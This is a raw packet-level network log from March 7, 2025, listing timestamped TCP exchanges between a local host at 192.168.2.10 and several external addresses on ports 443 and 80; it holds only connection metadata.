Mar 7, 2025 20:44:09.989676952 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.989696026 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.989727020 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.989743948 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.989773989 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.996272087 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.996391058 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.996417999 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.996463060 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.028846979 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.028914928 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.028950930 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.029023886 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.029052973 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.029058933 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.029084921 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.029105902 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.029105902 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.029105902 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.029134035 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.034281015 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.034358978 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.034382105 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.034429073 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.036371946 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.036422014 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.036431074 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.036438942 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.036470890 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.040314913 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.040391922 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.040415049 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.040462017 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.044373035 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.044452906 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.044473886 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.044517994 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.048273087 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.048330069 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.048352003 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.048449993 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.052273035 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.052315950 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.052376032 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.052400112 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.052416086 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.052449942 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.057840109 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.057912111 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.057929993 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.057972908 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.061551094 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.061614990 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.061636925 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.061676979 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.065485001 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.065550089 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.065570116 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.065612078 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.069282055 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.069350004 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.069370031 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.069415092 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.127752066 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.127821922 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.127918005 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.127952099 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.127969980 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.127999067 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.133820057 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.133929968 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.133964062 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.134020090 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.137109041 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.137190104 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.137212992 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.137253046 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.138092041 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.138168097 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.138190031 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.138223886 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.143264055 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.143359900 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.148299932 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.148413897 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.148449898 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.148492098 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.303303957 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.303380013 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.303406954 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.303463936 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.303862095 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.303913116 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.303920031 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.303950071 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.315639973 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.315705061 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.315749884 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.315792084 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.315804005 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.315855980 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.315885067 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.315896034 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.315924883 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.315948009 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.323641062 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.323704004 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.323724985 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.323765993 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.325102091 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.325154066 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.325169086 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.325205088 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.334614038 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.334676981 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.334697962 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.334748030 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.421521902 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.421593904 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.421619892 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.421664000 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.422226906 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.422280073 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.422291994 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.422334909 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.424374104 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.424446106 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.424460888 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.424499989 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.431056023 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.431118011 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.431135893 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.431190968 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.431958914 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.432009935 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.432034969 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.432087898 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.433998108 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.434072971 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.434084892 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.434129953 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.441370010 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.441457987 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.441473007 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.441514969 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.462028980 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.462282896 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.462311983 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.462387085 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.463057995 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.463113070 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.463160038 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.463206053 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.464387894 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.464440107 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.464488029 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.464534998 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.470958948 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.471052885 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.471077919 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.471131086 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.472192049 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.472265005 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.472292900 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.472352982 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.473993063 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.474101067 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.474112988 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.474162102 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.481065989 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.481200933 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.481216908 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.481273890 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.481280088 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.481394053 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.481400013 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.481446028 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.483119011 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.483201027 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.483222008 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.483274937 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.493014097 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.493127108 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.493153095 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.493199110 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.493205070 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.493247986 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.494255066 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.494318008 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.494338989 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.494385004 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.495573997 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.495646000 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.495799065 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.495866060 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.497590065 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.497694969 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.497715950 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.497769117 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.501900911 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.501991034 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.502362967 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.502432108 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.502454996 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.502501965 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.530137062 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.530199051 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.530333042 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.530364990 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.530446053 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.531141996 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.531223059 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.531235933 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.531281948 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.532921076 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.532991886 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.533014059 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.533056021 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.540776014 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.540867090 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.540932894 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.540957928 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.540977001 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.541018009 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.541208029 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.541256905 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.541264057 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.541309118 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.543673038 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.543757915 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.543771029 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.543816090 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.579431057 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.579754114 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.579785109 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.579874992 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.583221912 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.583324909 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.589400053 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.589515924 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.589540005 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.589593887 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.590415955 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.590504885 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.590513945 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.590560913 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.592295885 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.592375040 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.592392921 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.592438936 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.593888998 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.593957901 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.593969107 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.594014883 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.598033905 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.598107100 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.598133087 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.598156929 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.598172903 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.598220110 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.598366976 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:10.598400116 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:10.598463058 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:11.105375051 CET	49691	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:11.110424042 CET	80	49691	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:11.110538960 CET	49691	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:11.110780954 CET	49691	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:11.115786076 CET	80	49691	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:11.818131924 CET	80	49691	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:11.827836037 CET	49691	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:11.833159924 CET	80	49691	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:12.041105986 CET	80	49691	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:12.095315933 CET	49691	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:12.983297110 CET	49692	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:12.983355999 CET	443	49692	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:12.983423948 CET	49692	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:12.996417999 CET	49692	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:12.996459007 CET	443	49692	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:15.710679054 CET	443	49692	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:15.710787058 CET	49692	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:15.714468956 CET	49692	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:15.714493036 CET	443	49692	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:15.714843035 CET	443	49692	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:15.718041897 CET	49692	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:15.760376930 CET	443	49692	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:16.209016085 CET	443	49692	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:16.209084988 CET	443	49692	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:16.209163904 CET	49692	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:16.216550112 CET	49692	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:16.222915888 CET	49691	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:16.229017019 CET	80	49691	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:16.435543060 CET	80	49691	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:16.438307047 CET	49693	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:16.438359022 CET	443	49693	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:16.438468933 CET	49693	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:16.438783884 CET	49693	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:16.438796997 CET	443	49693	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:16.486047029 CET	49691	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:18.218651056 CET	443	49693	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:18.221667051 CET	49693	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:18.221704960 CET	443	49693	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:18.729676962 CET	443	49693	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:18.729779005 CET	443	49693	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:18.729871988 CET	49693	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:18.731096983 CET	49693	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:18.747383118 CET	49691	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:18.748611927 CET	49694	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:18.752892017 CET	80	49691	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:18.752973080 CET	49691	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:18.753834009 CET	80	49694	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:18.753931999 CET	49694	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:18.754101992 CET	49694	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:18.759151936 CET	80	49694	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:19.457384109 CET	80	49694	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:19.458951950 CET	49695	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:19.459019899 CET	443	49695	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:19.459112883 CET	49695	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:19.459366083 CET	49695	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:19.459378958 CET	443	49695	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:19.501723051 CET	49694	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:21.152831078 CET	443	49695	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:21.154897928 CET	49695	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:21.154937029 CET	443	49695	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:21.667649984 CET	443	49695	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:21.688292027 CET	443	49695	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:21.688458920 CET	49695	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:21.692461967 CET	49695	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:21.698756933 CET	49694	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:21.701412916 CET	49696	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:21.704272032 CET	80	49694	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:21.704358101 CET	49694	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:21.710072041 CET	80	49696	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:21.710192919 CET	49696	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:21.710388899 CET	49696	80	192.168.2.10	132.226.247.73
Mar 7, 2025 20:44:21.715358973 CET	80	49696	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:22.419866085 CET	80	49696	132.226.247.73	192.168.2.10
Mar 7, 2025 20:44:22.423015118 CET	49697	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:22.423065901 CET	443	49697	104.21.32.1	192.168.2.10
Mar 7, 2025 20:44:22.423190117 CET	49697	443	192.168.2.10	104.21.32.1
Mar 7, 2025 20:44:22.423945904 CET	49697	443	192.168.2.10	104.21.32.1
